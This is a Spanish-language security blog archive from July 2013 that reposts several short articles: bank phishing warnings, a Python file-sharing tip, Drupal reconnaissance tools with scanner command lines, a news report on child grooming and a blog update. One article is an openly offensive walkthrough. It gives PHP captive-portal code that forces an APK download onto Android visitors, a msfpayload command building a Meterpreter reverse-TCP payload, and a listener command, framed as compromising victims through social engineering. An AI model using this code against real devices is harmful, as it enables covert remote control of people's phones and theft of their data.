Archive for July 2013

Familia: Bancos Chilenos objetivos de Phishing | Pharming



Es común escuchar campañas contra el phishing que organizan bancos en Chile, dando consejos como:

  • No entregue su clave ni datos personales por teléfono o e-mail, Bci nunca se la pedirá a través de estos medios.
  • Escriba Ud. mismo en la barra del explorador la dirección web de Bci.cl
  • Debe tener actualizado el navegador, y también instalar los parches del sistema operativo.
  • Nunca te pediremos que descargues una aplicación a tu pc – Banco estado
Entre muchos otros consejos. BancoEstado por ejemplo tiene una galería de imágenes donde van reportando las campañas de phishing que los afectan  , sin embargo ningun consejo es suficiente, ni tener un antivirus o sistema actualizado.


Con el fin que la comunidad se imagine y sepa cuando esta en frente a un sitio que busca robar sus contraseñas o coordenadas de seguridad es que mostramos lo siguiente [Así se ve un sitio tratando de robar datos] :



Banco Santander [Intentando robar las coordenadas de transferencias] :



Banco Estado [Intentando robar: RUT + CLAVE + Totalidad Coordenadas Transferencias :



Banco BBVA [Totalidad coordenadas Transferencia]:





La seguridad se debe tomar como una costumbre en cada cosa que hacemos, de lo contrario, ya somos una victima potencial; solo es cosa de tiempo.

Leer artículo original: Familia: Bancos Chilenos objetivos de Phishing | Pharming

Compartiendo archivos de forma rápida en Linux un simple servidor HTTP

Jugando en casa el dia de ayer necesitaba pasarle a mi hermano un file asi que me puse a jugar con la terminal y me puse a investigar sobre montar un servidor http en la maquina que sea temporal y lo cual solo pueda compartir algunos folders no todo para ese cometido encontre simpleHTTPServer el cual viene instalado en cualquier distribucion GNU/LINUX  para poder hacerlo funcionar es simple con el comando python -m SimpleHTTPServer y podremos compartir el directorio donde deseemos compartir y luego de ello iniciara nuestro pequeño servidor local para poder compartir como se ve en la captura luego de inciar.

Luego de ello solo basta con dar la direccion ip que tenemos y el otro se podra conectar sin ningun problema teniendo como resultado la conexion y podra visulaizar lo que compartimos.

Ahora como veremos en la terminal tenemos un pequeño debug, donde visualizamos las conexiones que recibimos.

Espero les sirva, y puedan hacer uso de el.

Regards,
Snifer

Leer artículo original: Compartiendo archivos de forma rápida en Linux un simple servidor HTTP

Herramientas para realizar un fingerprinting a sitios en Drupal

Ya Domingo y esta semana no pude postear, nuevamente tengo 4 entradas a medias el porque simple y llanamente el trabajo pero ya ahora ando con algo de tiempo y vengo con esta entrada la cual trata sobre el famoso y conocido CMS (Content Management System) Drupal el cual esta alzando vuelo últimamente como digo apareció la moda Drupalera, todos son expertos en el, incluso los que recién tienen días conociéndolo se las saben todas.
Pero veremos en esta entrada el uso de dos herramientas que nos permiten reconocer características de un Drupal, en la primera etapa la cual es reconocimiento, al estar frente a un CMS de estas características lo que necesitamos es conocer el listado de módulos que tiene el sitio para ello usamos la primera herramienta que es DP-Scan, con la cual podremos reconocer la existencia de los plugins que tiene instalado esta herramienta esta desarrollada en Python, escrita por Ali Elouafiq 2012, el uso es fácil y sencillo como podemos ver a continuación:
Comandos para usar:
"\n<ScriptName> [filename.txt]"
"\n<ScriptName> [URL]"
"\n<ScriptName> [URL] user password // FOR HTTP AUTHORIZATION"
Y listo podemos ver que 7sabores tiene dos módulos instalados.
Del mismo modo hay una versión realizada en Ruby la cual cumple la misma función de poder listar los modulos es DrupalScan Ruby
La otra herramienta es cms-explorer que tiene el mismo funcionamiento que DPScan solo que no viene solo para Drupal así también realiza el reconocimiento respectivo a los siguientes CMS:
  • Drupal
  • WordPress
  • Joomla!
  • Mambo

Pero cual es el plus de esta herramienta que hace una búsqueda a su par de vulnerabilidades de los módulos, plugins instalados, permitiendo de este modo tener mayor conocimiento de nuestros vectores de ataque.

Buscando fallas de desarrollo, fuga de información con estas otras dos opciones Web Sorrow y DruScan

El primero es el buho Web Sorrow que anda en búsqueda de información sensible que nos permita encontrar algunas cosas interesantes que a los desarrolladores que instalaron se les haya pasado así también detectar la versión de un CMS, identificación y enumeración como su principal objetivo.

Algunos ejemplos básicos del uso de Web Sorrow:

Basic: perl Wsorrow.pl -host scanme.nmap.org -S
Stealthy: perl Wsorrow.pl -host scanme.nmap.org -ninja -proxy 190.145.74.10:3128
Scan for login pages: perl Wsorrow.pl -host 192.168.1.1 -auth
CMS intense scan: perl Wsorrow.pl -host 192.168.1.1 -Ws -Cp all -I
Most intense scan possible: perl Wsorrow.pl -host 192.168.1.1 -e
Dump http headers: perl headerDump.pl
Check if host is alive: perl hdt.pl -host 192.168.1.1

Encontrando el robots.txt el cual nos puedo permitir encontrar algunos paths del sitio que decidieron no hacerlo visible para los motores de busqueda y no sea indexado.

Lanzandolo para buscar el path de login y  de este modo poder ir un paso adelante.

Para poder saber mas de esta herramienta podemos acceder a su code google  Web Sorrow

La ultima herramienta que conoceremos es DruScan  la cual es bastante parecida a DPScan pero con algunos cambios adicionales entre los principales:
  • Listar usuarios del sistema, por medio de una mala configuración de Drupal y el tema que se este usando.
  • Búsqueda de Paths que lleguen a ser accesibles como /node/add y visualizar que tipo de contenido puede ser creado de manera anónima.
  •  Búsqueda de  /user para saber si la ruta es accesible. 

El autor es @dmouse como podemos ver en la siguiente captura un pequeño proceso del mismo.

Como pueden ver esta primera etapa de reconocimiento e identificación llega a ser mas rápida y sencilla con ayuda de algunos scripts, si conocen otras  porque no compartes en los comentarios  y generamos otra entrada.

Regards,
Snifer

Leer artículo original: Herramientas para realizar un fingerprinting a sitios en Drupal

Punto de acceso falso: seduciendo androides

  Partiendo de la entrada anterior en la que se creaba un punto de acceso falso, en esta ocasión añadiremos unas pequeñas modificaciones a la pagina de inicio del portal cautivo para que cuando un cliente con un dispositivo Android se conecte se inicie automáticamente la descarga de una aplicación maliciosa, todo esto mediante un simple script en php y metasploit ;).

  Lo primero será el script que verá la víctima al conectarse al portal cautivo, como he comentado antes éste está escrito en php y es el siguiente:

 

 <?php
        $userAgent = $_SERVER[HTTP_USER_AGENT];
        $userAgent = strtolower ($userAgent);
        $file = “downloads/archivo.apk”;
        if(strpos($userAgent, “android”) !== false)
        {
                if (file_exists($file)) {
                        header(‘Content-Description: File Transfer’);
                        header(‘Content-Type: application/vnd.android.package-archive’);
                        header(‘Content-Disposition: attachment; filename=’.basename($file));
                        header(‘Content-Transfer-Encoding: binary’);
                        header(‘Expires: 0’);
                        header(‘Cache-Control: must-revalidate, post-check=0, pre-check=0’);
                        header(‘Pragma: public’);
                        header(‘Content-Length: ‘ . filesize($file));
                        ob_clean();
                        flush();
                        readfile($file);
                }

        }
?>

  La utilidad de dicho script es detectar mediante el User Agent el sistema operativo que visita la página y, si éste es un Android, automáticamente descargara el archivo apk creado para la ocasión.

  Para el ejecutable malicioso me aproveché de que metasploit ya contenía en su base de datos una versión de meterpreter, así que previo msfupdate con la ayuda de msfpayload me dispuse a generar el archivo apk que la víctima instalaría en su dispositivo:

msfpayload android/meterpreter/reverse_tcp LHOST=mi_ip R > archivo.apk

Ahora solo queda colocar el archivo.apk en la carpeta downloads en /var/www/ y cuando la desdichada víctima acceda al portal cautivo se le descargará y sugerirá la instalación de nuestro perverso archivo (para todo esto es importante jugar con la ingeniería social 😉 ). Cuando el archivo sea instalado y ejecutado la víctima establecerá conexión con nuestro metasploit, aunque antes hay que ponerlo a la escucha:

msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E

 Y listo, tendremos una conexión mediante meterpreter con la víctima, aunque hay que tener en cuenta que el numero de posibilidades para “interactuar” con el objetivo es menor si es comparada con sistemas Windows o GNU/Linux.

  En resumen, hemos visto como con un sencillo script podemos dirigir ataques a distintos sistemas operativos en función del User Agent del navegador que acceda a la web. Además hay que tener en cuenta el factor de la ingeniería social, puesto que es importante mostrar una web creíble y una justificación por la que la víctima debería instalar nuestro apk.

Fuentes:

Nos leemos en breve.

Leer artículo original: Punto de acceso falso: seduciendo androides

[Noticia] Contactó por Whatsapp a menor y la habría abusado – Chile

El sujeto está acusado de haber iniciado una relación por mensajería con una niña de 12 años, con quien además tuvo un encuentro físico en donde habría abusado de ella.

SANTIAGO.- A disposición de la justicia quedó un sujeto de iniciales M.T.A., de 38 años, imputado por inducir a una menor a abandonar su hogar en la comuna de Graneros.

De acuerdo a los antecedentes recabados por la policía uniformada, los hechos ocurrieron el viernes 19 de este mes cuando una niña de 12 años habría concertado una cita con el hombre, a quien conoció hace más de tres meses por intermedio de un mensaje en una radio local, donde ella invitaba a desconocidos a que la agregaran al servicio de mensajería móvil WhatsApp.
Según la PDI fue en esa plataforma en la que iniciaron una relación sentimental y se habría materializado el día viernes, donde el sujeto la llevó hasta su domicilio, lugar donde pernoctó la víctima y supuestamente fue abusada sexualmente.

Por lo anterior, la niña de 12 años dio aviso a sus padres sobre su paradero, quienes avisaron a Carabineros de Graneros, deteniendo al sujeto y, posteriormente, siendo entregado a los detectives por instrucción del fiscal de turno para realizar las primeras diligencias con la respectiva inspección ocular del sitio de suceso, empadronamiento del sector y entrevista a los padres.

El jefe de la Brisexme Rancagua, el comisario Eduardo Rojas, señaló “que es importante saber cuáles son los amigos de sus hijos y con quienes están teniendo comunicación a través de las redes sociales, y de esta forma anticiparse a los movimientos de los inescrupulosos que mal utilizan las redes sociales”, agregó el comisario.

Leer artículo original: [Noticia] Contactó por Whatsapp a menor y la habría abusado – Chile

Cierra la Biblioteca @SniferL4bs y algunos cambios en el blog…

Hola como están si leen bien la Biblioteca de SniferL4bs cierra, el blog que cree hace mas de 1 año como una biblioteca para poder compartir libros, documentos, y material en general de informática llega a su fin, el cierre tiene una razón la cual es que pasara a formar parte directamente de sniferl4bs.com el motivo de esta desicion es el no poder seguir con el otro blog obviamente seguirá online pero los libros que se posteen y demás serán orientados en post mas informativos que tengan un contenido especifico y a su vez vendrán de la mano de libros, o bien semanalmente se realizara entradas con  libros, en la sección la cual sera Biblioteca -SniferL4bs y ahí vendrán respectivamente libros de Pentesting, Software Libre, Forense, Programación una recopilación de algunos dependiendo de lo que se ocurra pero dentro de esta seccion estaran ordenados debidamente las entradas del blog que contengan información referente sobre ello.
Asi tambien comenzare en lo posible cada domingo agregar un nuevo libro en la secciòn de LIbros papers de Seguridad cuya seccion estará orientada totalmente al area de Seguridad y todos con licencia CC nada de privativo :$ tendremos las dos secciones una Pirata y la otra legal.
A su vez pueden notar que volvimos con los post diarios, si  ya retomamos el camino del lado oscuro  los post diarios vendrán con algunos tips sugerencias o las nuevas secciones las energizaremos con nuevos tips, a su vez con programación, desarrollo buenas practicas Hacking Linux, retomando las anteriores series que las dejamos atrás.
Las novedades:
 Lista de Entradas de SniferL4bs -> Articulos del Blog
Proyectos que llegan 
Magazine Hack Red Beta: Esto anda en desarrollo, una revista que vendrá solo algunos lo saben xD
Podcast Dark Security: Podcast Mensual el cual anda en planeamiento planeacion jo jo  como sea ya lo veran.

Bueno eso es todo por el dia de hoy ya veremos que viene mas adelante.

Regards,
Snifer

Leer artículo original: Cierra la Biblioteca @SniferL4bs y algunos cambios en el blog…